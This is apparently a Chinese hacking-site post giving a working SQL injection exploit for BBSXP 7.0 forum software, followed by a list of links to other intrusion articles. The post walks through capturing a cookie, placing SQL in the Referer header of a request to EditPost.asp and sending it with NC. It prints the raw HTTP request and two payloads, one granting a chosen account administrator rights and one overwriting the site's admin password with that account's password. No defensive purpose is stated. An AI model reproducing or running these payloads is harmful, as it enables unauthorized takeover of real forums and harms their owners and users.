[组图]BBSXP 7.0 SQL漏洞利用
EditPost.asp?ThreadID=1&PostID=1 你修改帖子
抓COOKIE 然后再Referer:的EditPost.asp后边加上SQL语句
拿NC提交 用SQL的,都是有钱人!
POST:POST /bbs/EditPost.asp?ThreadID=998&PostID=3698 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/bbs/EditPost.asp?ThreadID=1&PostID=1','','','修改帖子成功');update bbsxp_users set UserRoleID=1 where username='google'--(加入以上代码,google为用户) http://localhost/bbs/EditPost.asp?ThreadID=1&PostID=1(填上贴子地址)
要进入后台必须再用NC提交一次数据.
(把以上红色代码修改为:)','','','修改帖子成功');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='google')--
| dxbbs漏洞(通杀7.3以前所有版本) | 04-06 | |
| 记对一足球推荐站点的渗透 | 04-06 | |
| 注射DB_ONER权限并且主机与数据库 | 04-06 | |
| bbsxp sql最新版再爆0day? | 04-02 | |
| BBS的通杀跨站方法 | 04-02 | |
| CCTV的XSS跨站 | 03-28 | |
| 全面解析百度XSS跨站漏洞 | 03-26 | |
| Wordpress 2.1.2 以及之前版本物 | 03-26 | |
| 动易最新入侵方法 | 03-15 | |
| PJBlog漏洞利用 | 03-14 | |
| DVBBS <= 7.1.0 sp1 博客 远程注 | 03-14 | |
| php简单入侵 | 02-07 | |
您现在的位置: